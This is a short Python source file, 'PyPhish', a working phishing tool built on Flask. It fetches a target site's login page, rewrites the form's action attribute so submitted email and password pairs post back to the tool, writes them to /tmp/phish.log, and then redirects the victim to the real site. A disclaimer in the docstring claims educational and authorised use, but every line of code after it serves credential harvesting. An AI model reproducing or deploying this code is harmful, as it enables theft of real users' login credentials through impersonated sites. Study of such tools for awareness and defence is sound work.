#!/usr/bin/env python
'''
    Written by @dustyfresh (c) 06-11-16
    
    ABOUT:
    PyPhish is a method of phishing using Python's flask and
    requests modules instead of PHP and HTML. PyPhish will 
    grab page and display it as it would be to the user. 
    PyPhish acts as a proxy but changes the action="some file or url" 
    to redirect all POST & GET data to be logged to PyPhish. 
    Then PyPhish redirects the user where they're supposed to go.
    
    PyPhish is awesome because you don't have to maintain HTML & PHP 
    template code for your phishing campaigns.
    
    This program is free software; you may redistribute 
    and/or modify it under the terms of the GNU General 
    Public License as published by the Free Software Foundation; 
    Version 2 (or later) with the clarifications and exceptions 
    described in the license file. This guarantees your right to 
    use, modify, and redistribute this software under certain 
    conditions. If you wish to embed this technology into 
    proprietary software, we sell alternative licenses 
    (contact @dustyfresh).
    
    NOTICE: The author of this software is not responsible for 
    illegal abuse of this code. The user of this code agrees to 
    have legal consent prior to performing any sort of phishing 
    on live targets. This is for educational and in some case with 
    permission professional use only.
'''
import re
from flask import Flask, request
import requests

url = ''

def mirror():
    headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Referer': '{}'.format(url)}
    req = requests.get(url, headers=headers)
    # Below we are using a regex sub to rewrite the HTML to change action="" with in the login form
    data = re.sub(r'(?<=action\=\")(.*?)\"', '/"', req.text)
    return data

def phish(email,password):
    with open("/tmp/phish.log", "a") as log:
        log.write('{}:{}\n'.format(email,password))

pyphish = Flask(__name__)
@pyphish.route('/', methods=['POST', 'GET'])
def home():
    try:
        # If the incoming request is a POST request then incercept form credentials
        if request.method == 'POST':
            # Below is where we set the POST variables from the form to intercept 
            # credentials and send them to our phish() logger function
            # send to our logging function
            phish(request.form['email'], request.form['pass'])
            # Now we will redirect them to the service they were supposed 
            # to be using
            return '<script>window.location="{}";</script>'.format(url)
        elif request.method == 'GET':
            # If the incoming request is a GET request then just display the mirror
            return mirror(), 200
    except Exception as e:
        print("There was an issue :( Here is the error:\n{}".format(e))

if __name__ == '__main__':
    pyphish.run(host='0.0.0.0', port=80, debug=True, threaded=True)